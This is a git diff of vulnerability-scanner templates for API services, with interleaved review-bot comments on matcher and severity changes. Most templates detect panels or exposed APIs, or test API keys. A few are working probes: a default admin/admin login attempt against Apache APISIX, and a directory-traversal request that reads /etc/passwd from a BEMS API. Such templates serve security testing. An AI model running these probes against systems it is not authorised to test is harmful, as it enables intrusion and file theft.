@@ -1,32 +0,0 @@ -id: api-thecatapi - -info: - name: TheCatApi API Test - author: daffainfo - severity: info - description: Pictures of cats from Tumblr - reference: - - https://docs.thecatapi.com/ - - https://github.com/daffainfo/all-about-apikey/tree/main/thecatapi - metadata: - max-request: 1 - tags: token-spray,thecatapi - -self-contained: true - -http: - - method: GET - path: - - "https://api.thecatapi.com/v1/votes" - - headers: - x-api-key: "{{token}}" - matchers: - - type: word - part: body - words: - - '"country_code":' - - '"created_at":' - condition: and - -# digest: 4b0a00483046022100e6d911ecb61631f9a18c965d18dfc50dc2c659696e07e35a066bea1998874a88022100a26e89623b58680d7e1e34cbc3b0d86c5e4a454222c75003848955186cfa288b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-thecatapi-503.yaml b/poc/api/api-thecatapi-503.yaml index 0eb02cde29..54740e47d8 100644 --- a/poc/api/api-thecatapi-503.yaml +++ b/poc/api/api-thecatapi-503.yaml @@ -4,10 +4,9 @@ info: name: TheCatApi API Test author: daffainfo severity: info - description: Pictures of cats from Tumblr reference: - https://docs.thecatapi.com/ - - https://github.com/daffainfo/all-about-apikey/tree/main/thecatapi + - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md tags: token-spray,thecatapi self-contained: true @@ -22,6 +21,7 @@ requests: - type: word part: body words: - - '"country_code":' - - '"created_at":' - condition: and \ No newline at end of file + - 'id":' + - 'image_id":' + - 'sub_id":' + condition: and diff --git a/poc/api/api-tink-504.yaml b/poc/api/api-tink-504.yaml deleted file mode 100644 index 7b16f84077..0000000000 --- a/poc/api/api-tink-504.yaml +++ /dev/null 
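Review bot: In the second `api-thecatapi-503.yaml` hunk the word `'id":'` is a substring of the other two words, `'image_id":'` and `'sub_id":'`, so under `condition: and` it adds no selectivity. All three also drop the opening quote that the removed `'"country_code":'` form had, which lets them match inside longer key names. I would write `- '"image_id":'` and `- '"sub_id":'`, and either remove the bare `id` entry or anchor it as `- '"id":'`.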
@@ -1,31 +0,0 @@ -id: api-tink - -info: - name: Tink API Test - author: dwisiswant0 - severity: info - reference: - - https://docs.tink.com/api - metadata: - max-request: 1 - tags: token-spray,tink - -self-contained: true - -http: - - method: GET - path: - - "https://api.tink.com/api/v1/user" - - headers: - Authorization: Bearer {{token}} - matchers: - - type: word - part: body - words: - - "appId" - - "externalUserId" - - "username" - condition: and - -# digest: 490a00463044022064bc122a937a39b63ea026801501211eec64ce7aa8adc30f055b2b4c87e69928022010d864dc724658ccf145c743989d9e1ea361b506b53e6d909eaeee6850ee8447:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-tink.yaml b/poc/api/api-tink.yaml new file mode 100644 index 0000000000..a7c5de8ccd --- /dev/null +++ b/poc/api/api-tink.yaml @@ -0,0 +1,25 @@ +id: api-tink + +info: + name: Tink API Test + author: dwisiswant0 + reference: https://docs.tink.com/api + severity: info + tags: token-spray,tink + +self-contained: true +requests: + - method: GET + path: + - "https://api.tink.com/api/v1/user" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - "appId" + - "externalUserId" + - "username" + condition: and diff --git a/poc/api/api-travisci.yaml b/poc/api/api-travisci.yaml deleted file mode 100644 index 5212516fc1..0000000000 --- a/poc/api/api-travisci.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: api-travisci - -info: - name: Travis CI API Test - author: zzeitlin - reference: https://developer.travis-ci.com/ - severity: info - tags: token-spray,travis - -requests: - - method: GET - path: - - "https://api.travis-ci.com/user" - headers: - Travis-API-Version: 3 - Authorization: token {{token}} - - matchers: - - type: status - status: - - 403 - negative: true diff --git a/poc/api/api-virustotal-511.yaml b/poc/api/api-virustotal-511.yaml index fbcb6e2600..0c039312df 100644 --- a/poc/api/api-virustotal-511.yaml +++ b/poc/api/api-virustotal-511.yaml 
@@ -6,11 +6,14 @@ info: severity: info reference: - https://developers.virustotal.com/reference - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md + metadata: + max-request: 1 tags: token-spray,virustotal self-contained: true -requests: + +http: - raw: - | POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 @@ -24,7 +27,9 @@ requests: - type: word part: body words: - - "'verbose_msg':" - - "'scan_date':" - - "'permalink':" + - '"verbose_msg":' + - '"scan_date":' + - '"permalink":' condition: and + +# digest: 4a0a0047304502206f6e83dbc66717b54926126ec584b60835783cb586214f57b93eb61d080e5a42022100d5a22a1ab5a848eb279134bd608e7b8288641d7fd089fe753bffd6de99668f8f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-virustotal-512.yaml b/poc/api/api-virustotal-512.yaml index 0c039312df..f48595c162 100644 --- a/poc/api/api-virustotal-512.yaml +++ b/poc/api/api-virustotal-512.yaml @@ -7,13 +7,10 @@ info: reference: - https://developers.virustotal.com/reference - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md - metadata: - max-request: 1 tags: token-spray,virustotal self-contained: true - -http: +requests: - raw: - | POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 @@ -27,9 +24,7 @@ http: - type: word part: body words: - - '"verbose_msg":' - - '"scan_date":' - - '"permalink":' + - "'verbose_msg':" + - "'scan_date':" + - "'permalink':" condition: and - -# digest: 4a0a0047304502206f6e83dbc66717b54926126ec584b60835783cb586214f57b93eb61d080e5a42022100d5a22a1ab5a848eb279134bd608e7b8288641d7fd089fe753bffd6de99668f8f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-visualstudio-513.yaml b/poc/api/api-visualstudio-513.yaml deleted file mode 100644 index a05d17e57a..0000000000 --- a/poc/api/api-visualstudio-513.yaml +++ /dev/null 
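Review bot: The new matcher words in the second `api-virustotal-512.yaml` hunk, `"'verbose_msg':"`, `"'scan_date':"` and `"'permalink':"`, look for single-quoted keys, which a JSON response body does not contain, so with `condition: and` the template cannot match and a working key is reported as invalid. The `api-virustotal-511.yaml` hunk in this same commit makes the opposite change, apparently for that reason. Keep the double-quoted form here: `- '"verbose_msg":'`, `- '"scan_date":'`, `- '"permalink":'`.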
@@ -1,23 +0,0 @@ -id: api-visualstudio - -info: - name: Visual Studio API Test - author: zzeitlin - reference: https://openapi.appcenter.ms/ - severity: info - tags: token-spray,visualstudio,microsoft - -requests: - - method: GET - path: - - "https://api.appcenter.ms/v0.1/apps" - headers: - Content-Type: application/json - X-Api-Token: "{{token}}" - - matchers: - - type: word - part: body - negative: true - words: - - 'Unauthorized' diff --git a/poc/api/api-visualstudio.yaml b/poc/api/api-visualstudio.yaml new file mode 100644 index 0000000000..a3440fdb9a --- /dev/null +++ b/poc/api/api-visualstudio.yaml @@ -0,0 +1,26 @@ +id: api-visualstudio + +info: + name: Visual Studio API Test + author: zzeitlin + severity: info + reference: https://openapi.appcenter.ms/ + tags: token-spray,visualstudio,microsoft + +self-contained: true +requests: + - method: GET + path: + - "https://api.appcenter.ms/v0.1/apps" + headers: + Content-Type: application/json + X-Api-Token: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"id":' + - '"description":' + - '"owner":' + condition: and diff --git a/poc/api/api-wakatime-514.yaml b/poc/api/api-wakatime-514.yaml index b48ed5e79f..07755c952b 100644 --- a/poc/api/api-wakatime-514.yaml +++ b/poc/api/api-wakatime-514.yaml @@ -3,17 +3,21 @@ id: api-wakatime info: name: WakaTime CI API Test author: zzeitlin - reference: https://wakatime.com/developers severity: info + reference: https://wakatime.com/developers tags: token-spray,wakatime +self-contained: true requests: - method: GET path: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"data":' + - '"seconds":' + - '"is_up_to_date":' + condition: and diff --git a/poc/api/api-wakatime.yaml b/poc/api/api-wakatime.yaml new file mode 100644 index 0000000000..b48ed5e79f --- /dev/null +++ b/poc/api/api-wakatime.yaml 
@@ -0,0 +1,19 @@ +id: api-wakatime + +info: + name: WakaTime CI API Test + author: zzeitlin + reference: https://wakatime.com/developers + severity: info + tags: token-spray,wakatime + +requests: + - method: GET + path: + - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" + + matchers: + - type: status + status: + - 401 + negative: true diff --git a/poc/api/api-weglot-516.yaml b/poc/api/api-weglot-516.yaml deleted file mode 100644 index 37e6b647ef..0000000000 --- a/poc/api/api-weglot-516.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-weglot - -info: - name: WeGlot API Test - author: zzeitlin - reference: https://developers.weglot.com/api/reference - severity: info - tags: token-spray,weglot - -self-contained: true -requests: - - method: POST - path: - - "https://api.weglot.com/translate?api_key={{token}}" - headers: - Content-Type: application/json - body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" - - matchers: - - type: word - part: body - negative: true - words: - - 'does not exist' diff --git a/poc/api/api-weglot.yaml b/poc/api/api-weglot.yaml index 9c1a8e2874..37e6b647ef 100644 --- a/poc/api/api-weglot.yaml +++ b/poc/api/api-weglot.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,weglot +self-contained: true requests: - method: POST path: diff --git a/poc/api/api-wordcloud-517.yaml b/poc/api/api-wordcloud-517.yaml deleted file mode 100644 index 860ab73d73..0000000000 --- a/poc/api/api-wordcloud-517.yaml +++ /dev/null 
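Review bot: The added `api-wakatime.yaml` treats every response other than 401 as a valid token (`status: 401` with `negative: true`), so a 429, a 5xx or a redirect is reported as a hit. The `api-wakatime-514.yaml` hunk in this commit replaces exactly this matcher with body words (`'"data":'`, `'"seconds":'`, `'"is_up_to_date":'`) and adds `self-contained: true`; the new file should carry the same matcher. The key also travels in the query string (`?api_key={{token}}`), so it will appear in any proxy or access log on the path.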
@@ -1,45 +0,0 @@ -id: api-wordcloud - -info: - name: Word Cloud API Test - author: daffainfo - severity: info - reference: - - https://wordcloudapi.com/getting-started - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Word%20Cloud.md - tags: token-spray,wordcloud - -self-contained: true -requests: - - raw: - - | - POST https://textvis-word-cloud-v1.p.rapidapi.com/v1/textToCloud HTTP/1.1 - Host: textvis-word-cloud-v1.p.rapidapi.com - content-type: application/json - x-rapidapi-host: textvis-word-cloud-v1.p.rapidapi.com - x-rapidapi-key: {{token}} - Content-Length: 349 - - { - "text": "This is a test. I repeat, this is a test. We are only testing the functionality of this api, nothing else. End of test.", - "scale": 0.5, - "width": 400, - "height": 400, - "colors": [ - "#375E97", - "#FB6542", - "#FFBB00", - "#3F681C" - ], - "font": "Tahoma", - "use_stopwords": true, - "language": "en", - "uppercase": false - } - - matchers: - - type: word - part: body - negative: true - words: - - '{"message":"You are not subscribed to this API."}' diff --git a/poc/api/api-wordcloud-518.yaml b/poc/api/api-wordcloud-518.yaml index 3f274ce4b7..860ab73d73 100644 --- a/poc/api/api-wordcloud-518.yaml +++ b/poc/api/api-wordcloud-518.yaml @@ -4,17 +4,13 @@ info: name: Word Cloud API Test author: daffainfo severity: info - description: Easily create word clouds reference: - https://wordcloudapi.com/getting-started - - https://github.com/daffainfo/all-about-apikey/tree/main/word-cloud - metadata: - max-request: 1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Word%20Cloud.md tags: token-spray,wordcloud self-contained: true - -http: +requests: - raw: - | POST https://textvis-word-cloud-v1.p.rapidapi.com/v1/textToCloud HTTP/1.1 
@@ -47,5 +43,3 @@ http: negative: true words: - '{"message":"You are not subscribed to this API."}' - -# digest: 4a0a0047304502200bb686f7740c3aa0631d8eff8a8c27854fef6f4e1c638d8a3075d1fd01dd81cb022100abe7621b7beb6ed80118f7f668d8151b8e45ec1fd802602bf80c4786332259f6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-youtube-519.yaml b/poc/api/api-youtube-519.yaml deleted file mode 100644 index 832da305b5..0000000000 --- a/poc/api/api-youtube-519.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-youtube - -info: - name: YouTube API Test - author: zzeitlin - severity: info - reference: - - https://developers.google.com/youtube/v3/docs - metadata: - max-request: 1 - tags: token-spray,youtube - -self-contained: true - -http: - - method: GET - path: - - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - - matchers: - - type: word - part: body - words: - - '"kind":' - - '"pageInfo":' - condition: and - -# digest: 4a0a004730450220736a86ef95feb0ef762e9857642ccf941afac2f9ea6920782f88724f5516128a02210099195000f3743f6b553cc99c71c70456c8160e1ff2acdd21fc5d54104a1df927:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-youtube.yaml b/poc/api/api-youtube.yaml new file mode 100644 index 0000000000..be1531a453 --- /dev/null +++ b/poc/api/api-youtube.yaml @@ -0,0 +1,22 @@ +id: api-youtube + +info: + name: YouTube API Test + author: zzeitlin + reference: https://developers.google.com/youtube/v3/docs + severity: info + tags: token-spray,youtube + +self-contained: true +requests: + - method: GET + path: + - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" + + matchers: + - type: word + part: body + words: + - '"kind":' + - '"pageInfo":' + condition: and \ No newline at end of file diff --git a/poc/api/apiman-panel-460.yaml b/poc/api/apiman-panel-460.yaml index 72c5d57fcc..85b65e14e6 100644 
--- a/poc/api/apiman-panel-460.yaml +++ b/poc/api/apiman-panel-460.yaml @@ -5,15 +5,16 @@ info: author: righettod severity: info description: An Apiman instance was detected via the login redirection. + tags: panel,apiman reference: - https://www.apiman.io/latest/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: cwe-id: CWE-200 - metadata: - max-request: 1 - tags: panel,apiman -http: +requests: - method: GET path: - "{{BaseURL}}/apimanui/api-manager" @@ -29,4 +30,4 @@ http: status: - 302 -# digest: 4b0a00483046022100b79ecda1929aedc281bad1fc900d632afc56bb2305a46933fc7a7d3446a2e2cd022100d538233edfb8d9c36e38b1188932e0de90768e3f35b8cc44b8f308026a7702f4:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/18 diff --git a/poc/api/apiman-panel-462.yaml b/poc/api/apiman-panel-462.yaml deleted file mode 100644 index 24bbf1f89b..0000000000 --- a/poc/api/apiman-panel-462.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apiman-panel - -info: - name: Apiman Login Panel - author: righettod - severity: info - description: An Apiman instance was detected via the login redirection. - reference: - - https://www.apiman.io/latest/ - classification: - cwe-id: CWE-200 - tags: panel,apiman - -requests: - - method: GET - path: - - "{{BaseURL}}/apimanui/api-manager" - - matchers-condition: and - matchers: - - type: word - words: - - "/auth/realms/apiman" - part: header - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/18 diff --git a/poc/api/apisix-default-login-492.yaml b/poc/api/apisix-default-login-492.yaml index cb4e83e6df..c16b0c60b1 100644 --- a/poc/api/apisix-default-login-492.yaml +++ b/poc/api/apisix-default-login-492.yaml 
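Review bot: The `classification` block added in the first `apiman-panel-460.yaml` hunk contains an empty `cve-id:` key, which parses as null, next to `cvss-score: 0.0`. For a panel detection with no CVE the key should be left out rather than left blank, so that tooling reading the field does not have to special-case an empty value. If the zero score is meant to say "informational", `severity: info` already states it.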
@@ -1,22 +1,13 @@ id: apisix-default-login - info: - name: Apache Apisix Default Admin Login + name: Apache Apisix Default Login author: pdteam - severity: high - description: An Apache Apisix default admin login was discovered. + severity: critical + tags: apisix,apache,default-login metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org - reference: - - https://apisix.apache.org/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: apisix,apache,default-login - requests: - raw: - | @@ -27,25 +18,20 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - admin - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - '"data"' - '"token"' - '"code":0' condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/poc/api/arcgis-rest-api.yaml b/poc/api/arcgis-rest-api.yaml index b60cfd2026..f230552dbc 100644 --- a/poc/api/arcgis-rest-api.yaml +++ b/poc/api/arcgis-rest-api.yaml @@ -1,20 +1,19 @@ id: arcgis-rest-api info: - name: ArcGIS Exposed Docs + name: ArcGIS Exposed REST API documentation author: Podalirius severity: info - description: ArcGIS documents were discovered. - tags: api,arcgis,cms + description: ArcGIS REST API documentation was discovered. reference: - https://enterprise.arcgis.com/en/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + metadata: + max-request: 1 + tags: api,arcgis,cms,panel -requests: +http: - method: GET path: - '{{BaseURL}}/server/sdk/rest/index.html' 
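Review bot: The first `apisix-default-login-492.yaml` hunk raises `severity` from `high` to `critical` while deleting the `description`, the reference and the `classification` block (`cvss-score: 8.3`, `cwe-id: CWE-522`) that documented the rating. A finding for default `admin`/`admin` credentials now reaches triage with a higher severity and no recorded justification. I would either keep `severity: high` together with the classification, or keep the classification and update the vector to one that scores as critical.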
@@ -29,4 +28,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/03/20 +# digest: 4a0a0047304502206b9563fbbf34d888667c10a8a5a4dce68e81457f47edd26ab854c267c949e70f022100859b421e5c7a575e8f595314487d7ece97c9e8badc0129c5b368ad86cd8f50b6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/bems-api-lfi-709.yaml b/poc/api/bems-api-lfi-709.yaml deleted file mode 100644 index fa2efedbb9..0000000000 --- a/poc/api/bems-api-lfi-709.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: bems-api-lfi - -info: - name: Longjing Technology BEMS API 1.21 - Arbitrary File Retrieval - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file retrieval vulnerability. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/poc/api/bems-api-lfi-711.yaml b/poc/api/bems-api-lfi-711.yaml index 906ed1fe4d..dfde5d648f 100644 --- a/poc/api/bems-api-lfi-711.yaml +++ b/poc/api/bems-api-lfi-711.yaml 
@@ -1,22 +1,14 @@ id: bems-api-lfi info: - name: Longjing Technology BEMS API 1.21 - Local File Inclusion + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download author: gy741 severity: high - description: Longjing Technology BEMS API 1.21 is vulnerable to local file inclusion. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - - https://packetstormsecurity.com/files/163702/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - max-request: 1 - tags: lfi,packetstorm + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi -http: +requests: - method: GET path: - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" @@ -25,10 +17,8 @@ http: matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# digest: 4b0a00483046022100c23364bc1edb9b12d6360534784f7909102eaa2b7d6ade0a4ec84cf5d45acc55022100ce9a9757a3391cd8fd9287eb0bb043335ba1dea6c218aef73d2bb6828a37781e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/bems-api-lfi-712.yaml b/poc/api/bems-api-lfi-712.yaml deleted file mode 100644 index dfde5d648f..0000000000 --- a/poc/api/bems-api-lfi-712.yaml +++ /dev/null 
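Review bot: The regex in the second `bems-api-lfi-711.yaml` hunk loses its trailing colon, `"root:.*:0:0"` instead of `"root:.*:0:0:"`, so it no longer requires the field separator after the GID and is a looser test for a passwd line. The first hunk also drops the `classification` block (`cvss-score: 7.5`, `cwe-id: CWE-22`) and the second reference. I would keep `- "root:.*:0:0:"` and the classification so the finding stays precise and can be prioritised.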
@@ -1,24 +0,0 @@ -id: bems-api-lfi - -info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/poc/api/burp-api-detect-810.yaml b/poc/api/burp-api-detect-810.yaml new file mode 100644 index 0000000000..d1c703aa98 --- /dev/null +++ b/poc/api/burp-api-detect-810.yaml @@ -0,0 +1,28 @@ +id: burp-rest-api-detect + +info: + name: Burp Rest API Server Running + author: joanbono + severity: info + reference: + - https://portswigger.net/burp/documentation/enterprise/api-reference + tags: burp,tech + +requests: + - method: GET + path: + - "{{BaseURL}}/v0.1/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Burp API' + part: body + - type: word + words: + - 'X-Burp-Version' + part: header + - type: status + status: + - 200 diff --git a/poc/api/burp-api-detect-812.yaml b/poc/api/burp-api-detect-812.yaml deleted file mode 100644 index 10cc8bcac8..0000000000 --- a/poc/api/burp-api-detect-812.yaml +++ /dev/null 
@@ -1,27 +0,0 @@ -id: burp-rest-api-detect - -info: - name: Burp Rest API Server Running - author: joanbono - severity: info - reference: https://portswigger.net/burp/documentation/enterprise/api-reference - tags: burp,tech - -requests: - - method: GET - path: - - "{{BaseURL}}/v0.1/" - - matchers-condition: and - matchers: - - type: word - words: - - 'Burp API' - part: body - - type: word - words: - - 'X-Burp-Version' - part: header - - type: status - status: - - 200 diff --git a/poc/api/burp-api-detect.yaml b/poc/api/burp-api-detect.yaml index d1c703aa98..10cc8bcac8 100644 --- a/poc/api/burp-api-detect.yaml +++ b/poc/api/burp-api-detect.yaml @@ -4,8 +4,7 @@ info: name: Burp Rest API Server Running author: joanbono severity: info - reference: - - https://portswigger.net/burp/documentation/enterprise/api-reference + reference: https://portswigger.net/burp/documentation/enterprise/api-reference tags: burp,tech requests: diff --git a/poc/api/etcd-unauthenticated-api.yaml b/poc/api/etcd-unauthenticated-api.yaml index b41d5c896c..1c523c0a06 100644 --- a/poc/api/etcd-unauthenticated-api.yaml +++ b/poc/api/etcd-unauthenticated-api.yaml 
@@ -1,40 +1,28 @@ id: http-etcd-unauthenticated-api-data-leak - info: name: etcd Unauthenticated HTTP API Leak author: dhiyaneshDk severity: high - reference: - - https://hackerone.com/reports/1088429 - metadata: - max-request: 1 - tags: misconfig,hackerone,unauth,etcd - -http: + reference: https://hackerone.com/reports/1088429 + tags: unauth +requests: - method: GET path: - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and matchers: - type: word - part: body words: - '"roles"' - '"permissions"' - '"role"' - '"kv"' condition: and - + part: body + - type: status + status: + - 200 - type: word part: header words: - "text/plain" - - "application/json" - condition: or - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100897d3dde5e9a2dfd0ab7d17ab781c555d44ad28bc754236ec6bf33a7ec4c0d7c022100f5ba5418fa82fa65ff1d95bedc9dffea5b1861016c575cc71e7898fbd6c8a3ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/exposed-docker-api-7299.yaml b/poc/api/exposed-docker-api-7299.yaml index 527544a236..f3b973ca86 100644 --- a/poc/api/exposed-docker-api-7299.yaml +++ b/poc/api/exposed-docker-api-7299.yaml @@ -2,13 +2,11 @@ id: exposed-docker-api info: name: Exposed Docker API - author: furkansenan,dwisiswant0 + author: furkansenan & dwisiswant0 severity: info - metadata: - max-request: 2 - tags: docker,unauth,devops,misconfig + tags: docker,unauth,devops -http: +requests: - method: GET path: - "http://{{Hostname}}/version" @@ -20,16 +18,12 @@ http: words: - "application/json" part: header - - type: word words: - "KernelVersion" - "BuildTime" condition: and part: body - - type: status status: - 200 - -# digest: 490a0046304402203efb60ca5cd72b8e84389f1f375a834b8f2b7249a37ebb17fcf1fe352301abc402202547c7d3f2bcbd803a4dc349cb4d6d4a0b41f5915aa09c6b3216b504f6714566:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/exposed-glances-api-7308.yaml b/poc/api/exposed-glances-api-7308.yaml index d1028e6dd8..e00fe91045 100644 --- a/poc/api/exposed-glances-api-7308.yaml 
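Review bot: The header matcher at the end of the poc/api/etcd-unauthenticated-api.yaml hunk now accepts only `text/plain`, because `- "application/json"` and `condition: or` are removed. Under `matchers-condition: and`, an endpoint that answers with a JSON content type (which the etcd v2 API normally does, as far as I know) would no longer be reported, so the template can miss exactly the exposure it is meant to flag. I would keep both words with `condition: or`. The new file poc/api/http-etcd-unauthenticated-api-data-leak.yaml later in this patch carries the same single-word header matcher.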
+++ b/poc/api/exposed-glances-api-7308.yaml @@ -1,27 +1,29 @@ -id: exposed-glances-api -info: - name: Exposed Glances API - author: princechaddha - severity: low - description: Glances is a cross-platform system monitoring tool written in Python. - reference: https://nicolargo.github.io/glances/ - tags: glances,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'title">Glances' - - 'glances.config' - - '' - part: body - condition: and +id: exposed-glances-api + +info: + name: Exposed Glances API + author: princechaddha + severity: low + description: Glances is a cross-platform system monitoring tool written in Python. + reference: + - https://nicolargo.github.io/glances/ + tags: glances,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'title">Glances' + - 'glances.config' + - '' + part: body + condition: and diff --git a/poc/api/fastapi-docs-7398.yaml b/poc/api/fastapi-docs-7398.yaml new file mode 100644 index 0000000000..e0925b7940 --- /dev/null +++ b/poc/api/fastapi-docs-7398.yaml @@ -0,0 +1,22 @@ +id: fastapi-docs + +info: + name: FastAPI Docs + author: github.com/its0x08 + severity: info + tags: fastapi,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/docs" + - "{{BaseURL}}/redoc" + - "{{BaseURL}}/openapi.json" + + matchers: + - type: word + words: + - "FastAPI - Swagger UI" + - "FastAPI - ReDoc" + - '{"title":"FastAPI"' + condition: or diff --git a/poc/api/fastapi-docs-7399.yaml b/poc/api/fastapi-docs-7399.yaml index e0925b7940..794df02ac0 100644 --- a/poc/api/fastapi-docs-7399.yaml +++ b/poc/api/fastapi-docs-7399.yaml 
@@ -1,22 +1,22 @@ -id: fastapi-docs - -info: - name: FastAPI Docs - author: github.com/its0x08 - severity: info - tags: fastapi,tech,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/docs" - - "{{BaseURL}}/redoc" - - "{{BaseURL}}/openapi.json" - - matchers: - - type: word - words: - - "FastAPI - Swagger UI" - - "FastAPI - ReDoc" - - '{"title":"FastAPI"' - condition: or +id: fastapi-docs + +info: + name: FastAPI Docs + author: github.com/its0x08 + severity: info + tags: fastapi,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/docs" + - "{{BaseURL}}/redoc" + - "{{BaseURL}}/openapi.json" + + matchers: + - type: word + words: + - "FastAPI - Swagger UI" + - "FastAPI - ReDoc" + - '{"title":"FastAPI"' + condition: or diff --git a/poc/api/gitlab-api-user-enum-7668.yaml b/poc/api/gitlab-api-user-enum-7668.yaml index da88f8d2fa..40bafaf2d9 100644 --- a/poc/api/gitlab-api-user-enum-7668.yaml +++ b/poc/api/gitlab-api-user-enum-7668.yaml @@ -1,9 +1,12 @@ id: gitlab-api-user-enum info: - author: Suman_Kar name: GitLab - User Information Disclosure Via Open API + author: Suman_Kar severity: medium - reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + reference: + - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + metadata: + shodan-query: http.title:"GitLab" tags: gitlab,enum,misconfig,disclosure requests: - raw: diff --git a/poc/api/gitlab-api-user-enum.yaml b/poc/api/gitlab-api-user-enum.yaml index e335cf9397..6d6aac772a 100644 --- a/poc/api/gitlab-api-user-enum.yaml +++ b/poc/api/gitlab-api-user-enum.yaml 
